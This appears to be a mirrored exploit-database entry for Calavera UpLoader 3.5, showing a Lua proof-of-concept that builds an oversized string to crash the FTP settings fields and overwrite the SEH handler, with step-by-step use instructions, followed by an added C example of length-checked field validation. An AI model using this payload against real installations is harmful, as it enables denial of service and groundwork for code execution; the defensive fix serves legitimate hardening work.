Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)

CVE: N/A
Category: CWE-264
Price: N/A
Severity: High
Author: N/A
Risk: High
Exploitation Type: Remote
Date: 2021-01-04
CPE: cpe:cpe:/a:calavera:uploader:3.5.039
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021010024

Below is a copy:

-- Title : Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite).
-- Courtesy of Rmulo, @uromulou - Date : 04/01/2021.

-- PoC < Proof of Concept:
--
-- 1 -> Run the Lua script to create the file "poc.dat"...
-- 2 -> Copy the content of the new file "poc.dat" to clipboard...
-- 3 -> Open the application...
-- 4 -> Click on "Settings"...
-- 5 -> Paste the contents of the generated file into the parameters "FTP Address", "Username" and "Password". Furthermore, check the box with the statement "Check to save password in preferences"...
-- 6 -> Down...
--


print("-> Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)")
print("-> This exploit was written by Rmulo, @uromulou.")

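-- Layout of the pasted string: 477 filler bytes, two 4-byte markers
-- ("BBBB", "CCCC"), then 2000 bytes of 0xff (the \xff escape needs Lua 5.2 or later).
local buffer = string.rep("A", 477) .. "BBBB" .. "CCCC" .. string.rep("\xff", 2000)

-- Open in binary mode so the 0xff bytes are written unchanged; stop if the file cannot be created.
local file = assert(io.open("poc.dat", "wb"))
file:write(buffer)
file:close()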
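
A defensive counterpart to the PoC above, added here as an example and not taken from the application or from the exploit author: length-checked, validated handling of the three settings fields, assuming the crash comes from copying them into fixed-size buffers without a bound (the page does not show the application's code). The type names, function names and field limits are hypothetical.

```c
#include <stdio.h>
#include <string.h>

/* Assumed limits (253, 64 and 128 bytes plus NUL), not taken from Calavera
   UpLoader: 253 is the longest DNS name; the other two are illustrative. */
typedef struct { char host[254], user[65], pass[129]; } ftp_settings;
typedef enum { FIELD_OK, FIELD_EMPTY, FIELD_TOO_LONG, FIELD_BAD_BYTE } field_status;

/* Copy len bytes (not assumed NUL-terminated) only if they fit and are
   printable ASCII; oversized input is rejected, never truncated. */
static field_status store_field(char *dst, size_t cap, const char *src, size_t len)
{
    if (len == 0) return FIELD_EMPTY;
    if (len >= cap) return FIELD_TOO_LONG;
    for (size_t i = 0; i < len; i++)
        if ((unsigned char)src[i] < 0x20 || (unsigned char)src[i] > 0x7e)
            return FIELD_BAD_BYTE;
    memcpy(dst, src, len);
    dst[len] = '\0';
    return FIELD_OK;
}

/* Validate into a scratch copy so a rejected paste leaves *out untouched. */
field_status apply_ftp_settings(ftp_settings *out, const char *host, size_t hl,
        const char *user, size_t ul, const char *pass, size_t pl)
{
    ftp_settings tmp = {0};
    field_status st;
    if ((st = store_field(tmp.host, sizeof tmp.host, host, hl)) != FIELD_OK) return st;
    if ((st = store_field(tmp.user, sizeof tmp.user, user, ul)) != FIELD_OK) return st;
    if ((st = store_field(tmp.pass, sizeof tmp.pass, pass, pl)) != FIELD_OK) return st;
    *out = tmp;
    return FIELD_OK;
}

int main(void)
{
    /* Constructed sample with the layout of poc.dat: 477 + 4 + 4 + 2000 bytes. */
    static char big[2485];
    ftp_settings s = {0};
    memset(big, 'A', 477);
    memcpy(big + 477, "BBBBCCCC", 8);
    memset(big + 485, 0xff, 2000);
    printf("oversized paste: %d\n", apply_ftp_settings(&s, big, sizeof big, "u", 1, "p", 1));
    printf("normal settings: %d\n",
           apply_ftp_settings(&s, "ftp.example.org", 15, "alice", 5, "s3cret pass", 11));
    return 0;
}
```

Rejecting the whole submission instead of truncating means the saved preferences never hold a partial, attacker-shaped value that a later code path could copy unchecked.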
